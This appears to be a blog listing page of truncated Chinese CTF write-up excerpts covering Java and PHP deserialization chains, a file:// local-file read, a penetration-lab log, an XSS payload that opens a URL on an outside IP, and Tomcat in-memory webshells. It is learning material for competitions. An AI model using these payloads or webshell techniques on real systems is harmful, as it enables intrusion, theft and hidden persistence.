wmctf2022 java 比较快的解法 此解法在r3那里拿了3血 发现那个url栏目可以file协议读文件，随后尝试file:///时可以直接枚举当前目录下的文件， 直接可以知道文件名，此外，发现file:///proc/self/cmdline可以直接读到tomcat绝对路径，这样一来找其webapps目录下就可以找到源码（刚好有个war包可…

红日靶场4渗透记录（上） 0 前言 后面的失败了，看到第4节结束就差不多了，靶场可能有点问题 1 环境搭建 最近红日靶场官网寄了，若想下载靶场镜像请私聊我 解压后是三个容器，web,dc,win7。按理来说我们只需来到vmware界面选择导入虚拟机就可以，但是这次选择该选项后是需要自动创建虚拟机的，要选一个空间稍大的一点的目录（默认是文档目录），大…

fatfree反序列化探析 一个php框架，全称fat free framework,版本3.7.2，源码是这个https://github.com/bcosca/fatfree 这里主要探讨几种fatfree常见的反序列化利用poc，wmctf2020，国赛2020都有出现 demo，直接把index.php修改为如下 <?php // K…

蓝帽杯2022部分wp [蓝帽杯2022]fatfree 一开始很快找到原题：2020国赛babyserialize 然后找到一条可以phpinfo的rce链 <?php namespace DB{ abstract class Cursor implements \IteratorAggregate {} } namespace DB\SQ…

[dasctf7月]newer 建议参考jacko神：https://www.wolai.com/7MymbpgzhHWMdAoh2Ycb89 这个题很快发现cookie处可以反序列化,但是也很快发现没啥可以rce 当时想的是反序列化原生类，但是很快想起实现不了 最后看了jacko神的wP，原来是composer.json { "requ…

前言： 由于是大比赛还是开篇感慨两句。我对比赛题目的评价是赞不绝口。这次作为[纯情女色大学生]的队长，带领团队（基本上就我和2个web一个密码在做）完成了rcefile，babyweb，wp-um,polydiv，而ez_login,密码签到,ez_web差点出了，很是遗憾，再接再厉吧 [强网杯2022]rcefile 改content-type后…

[diceCTF2022]pastebin https://www.freebuf.com/articles/web/245097.html 就是说呢，img一个标签符也可以自己闭合 payload paste=<img src="x" onerror=window.open('http://8.129.42.1…

鹏城杯Ez_java 分析 看源码 关注到这，考察反序列化 @ResponseBody @PostMapping({"/read"}) public String read(@RequestParam(name = "data", required = true) String data) throws IO…

servlet型内存马 servlet servlet的demo import javax.servlet.*; import javax.servlet.annotation.WebServlet; import java.io.IOException; // 添加路由 @WebServlet("/thaii") public…

valve型内存马 参考value内存马 - Java反序列化 - CTF知识点 | mikufans = (viewofthai.link) pipeline调用链 基础知识 tomcat的adapter到container之间，有个pipeline调用链， 比如在 StandardHostValve 类中是这样调用 vavle 的 invoke…